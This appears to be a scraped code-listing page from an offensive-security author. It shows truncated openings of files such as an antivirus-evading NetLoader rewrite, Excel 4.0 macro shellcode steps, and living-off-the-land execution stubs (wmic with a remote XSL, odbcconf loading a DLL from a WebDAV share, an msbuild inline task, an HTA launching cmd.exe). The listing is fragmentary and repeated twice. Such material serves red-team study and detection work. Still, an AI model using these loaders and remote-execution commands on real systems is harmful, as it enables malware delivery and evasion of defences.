Arno0x

## pwTester.py
import re, json
from math import log2
import getpass
import requests, zipfile, io
import os, datetime
import hashlib
from collections import Counter
from functools import reduce

#=================================================================

## pendu.py
#!/usr/bin/python
# -*- coding: utf8 -*-
from sys import stdout
import json
import os

# Import external modules
try:
    import requests
except ModuleNotFoundError as e:

## life.py
#!/usr/bin/python
# -*- coding: utf8 -*-
import sys
import random
import time
import re
import argparse
import os

# Import external modules

## NetLoader.cs
/*
Author: Arno0x0x, Twitter: @Arno0x0x
Completely based on @Flangvik netloader

This partial rewrite of @Flangvik Netloader includes the following changes:

	- Allow loading of an XOR encrypted binary to bypass antiviruses
		To encrypt the initial binary you can use my Python transformFile.py script.
		Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor


## shellcode.xlsm
BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL

1. Open Excel
2. Click on the active tab
3. Select "Insérer"
4. Click on "Macro MS Excel 4.0".
5. This will create a new worksheet called "Macro1"

================================================================================
In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:

## TestAssembly.cs
/*

================================ Compile as a .Net DLL ==============================
	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs

*/

using System.Windows.Forms;

namespace TestNamespace

## wmic.xsl
<?xml version='1.0'?>
<!-- Discovered by @SubTee and @mattifestation -->
<!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" -->
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[

## odbcconf.cs
/*
To use with odbcconf.exe:

odbcconf /S /A {REGSVR odbcconf.dll}

or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
*/

using System;

## msbuild.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>
  </Target>
  <UsingTask
    TaskName="SharpLauncher"
    TaskFactory="CodeTaskFactory"

## calc.hta
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
        var c = "cmd.exe /c calc.exe";
        new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
	import re, json
	from math import log2
	import getpass
	import requests, zipfile, io
	import os, datetime
	import hashlib
	from collections import Counter
	from functools import reduce

	#=================================================================
	#!/usr/bin/python
	# -- coding: utf8 --
	from sys import stdout
	import json
	import os

	# Import external modules
	try:
	import requests
	except ModuleNotFoundError as e:
	#!/usr/bin/python
	# -- coding: utf8 --
	import sys
	import random
	import time
	import re
	import argparse
	import os

	# Import external modules
	/*
	Author: Arno0x0x, Twitter: @Arno0x0x
	Completely based on @Flangvik netloader

	This partial rewrite of @Flangvik Netloader includes the following changes:

	- Allow loading of an XOR encrypted binary to bypass antiviruses
	To encrypt the initial binary you can use my Python transformFile.py script.
	Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor
	BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL

	1. Open Excel
	2. Click on the active tab
	3. Select "Insérer"
	4. Click on "Macro MS Excel 4.0".
	5. This will create a new worksheet called "Macro1"

	================================================================================
	In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:
	/*

	================================ Compile as a .Net DLL ==============================
	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs

	*/

	using System.Windows.Forms;

	namespace TestNamespace
	<?xml version='1.0'?>
	<!-- Discovered by @SubTee and @mattifestation -->
	<!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" -->
	<stylesheet
	xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
	xmlns:user="placeholder"
	version="1.0">
	<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	/*
	To use with odbcconf.exe:

	odbcconf /S /A {REGSVR odbcconf.dll}

	or, from a remote location (if WebDAV support enabled):
	odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
	*/

	using System;
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
	<Target Name="Hello">
	<SharpLauncher >
	</SharpLauncher>
	</Target>
	<UsingTask
	TaskName="SharpLauncher"
	TaskFactory="CodeTaskFactory"
	<html>
	<head>
	<HTA:APPLICATION ID="HelloExample">
	<script language="jscript">
	var c = "cmd.exe /c calc.exe";
	new ActiveXObject('WScript.Shell').Run(c);
	</script>
	</head>
	<body>
	<script>self.close();</script>